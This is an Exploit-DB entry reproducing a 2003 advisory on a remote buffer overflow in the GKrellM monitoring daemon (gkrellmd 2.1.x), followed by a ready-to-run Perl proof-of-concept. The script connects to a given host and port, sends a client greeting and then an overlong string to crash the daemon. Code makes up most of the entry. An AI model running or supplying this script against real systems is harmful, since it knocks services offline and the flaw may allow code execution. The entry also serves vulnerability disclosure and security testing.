Gkrellmd 2.1 - Remote Buffer Overflow (1)

EDB-ID:

22831


Author:

dodo

Type:

dos


Platform:

FreeBSD

Date:

2003-06-24


source: https://www.securityfocus.com/bid/8022/info

GKrellMd has been reported prone to a remote buffer overflow vulnerability, arbitrary code execution is possible.

The issue presents itself due to a lack of sufficient bounds checking performed on network-based data. If data exceeding the maximum reserved memory buffer size is received arbitrary memory may be corrupted.

A remote attacker may ultimately exploit this issue remotely to seize control of the affected daemon and execute arbitrary code.

This vulnerability has been reported to affect Gkrellm 2.1.13.

	#!/usr/bin/perl -s
	use IO::Socket;
	#
	# proof of concept code
	# tested: grkellmd 2.1.10
	#



		if(!$ARGV[0] || !$ARGV[1])
		{ print "usage: ./gkrellmcrash.pl <host> <port>\n"; exit(-1); }

	$host = $ARGV[0];
	$port = $ARGV[1];
	$exploitstring = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

	$socket = new IO::Socket::INET
	(
	Proto    => "tcp",
	PeerAddr => $host,
	PeerPort => $port,
	);

	die "unable to connect to $host:$port ($!)\n" unless $socket;

	print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have
	sleep(1);
	print $socket $exploitstring;

	close($socket);